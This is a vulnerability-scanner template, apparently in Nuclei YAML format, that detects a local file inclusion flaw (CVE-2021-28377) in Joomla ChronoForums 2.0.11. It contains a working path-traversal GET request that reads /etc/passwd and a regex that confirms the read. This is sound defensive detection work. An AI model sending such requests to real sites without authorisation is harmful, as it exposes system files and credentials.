42 lines
1.6 KiB
YAML
42 lines
1.6 KiB
YAML
id: CVE-2021-28377
|
|
|
|
info:
|
|
name: Joomla! ChronoForums 2.0.11 - Local File Inclusion
|
|
author: 0x_Akoko
|
|
severity: medium
|
|
description: Joomla! ChronoForums 2.0.11 avatar function is vulnerable to local file inclusion through unauthenticated path traversal attacks. This enables an attacker to read arbitrary files, for example the Joomla! configuration file which contains credentials.
|
|
remediation: |
|
|
Update Joomla! ChronoForums to the latest version (2.0.12) or apply the provided patch to fix the LFI vulnerability.
|
|
reference:
|
|
- https://herolab.usd.de/en/security-advisories/usd-2021-0007/
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2021-28377
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
|
|
cvss-score: 5.3
|
|
cve-id: CVE-2021-28377
|
|
cwe-id: CWE-22
|
|
epss-score: 0.00158
|
|
epss-percentile: 0.52151
|
|
cpe: cpe:2.3:a:chronoengine:chronoforums:2.0.11:*:*:*:*:joomla:*:*
|
|
metadata:
|
|
max-request: 1
|
|
vendor: chronoengine
|
|
product: chronoforums
|
|
framework: joomla
|
|
tags: cve,cve2021,chronoforums,lfi,joomla
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/index.php/component/chronoforums2/profiles/avatar/u1?tvout=file&av=../../../../../../../etc/passwd"
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: regex
|
|
regex:
|
|
- "root:.*:0:0:"
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
# digest: 4b0a00483046022100873de7156e0e6e8a93f20b854af4a84d65930044259df6e0912c2388fc080732022100d540c3b23ac3e1f27b792e00e1749ca8e17771fa75bb66444993befe1e8e3a27:922c64590222798bb761d5b6d8e72950 |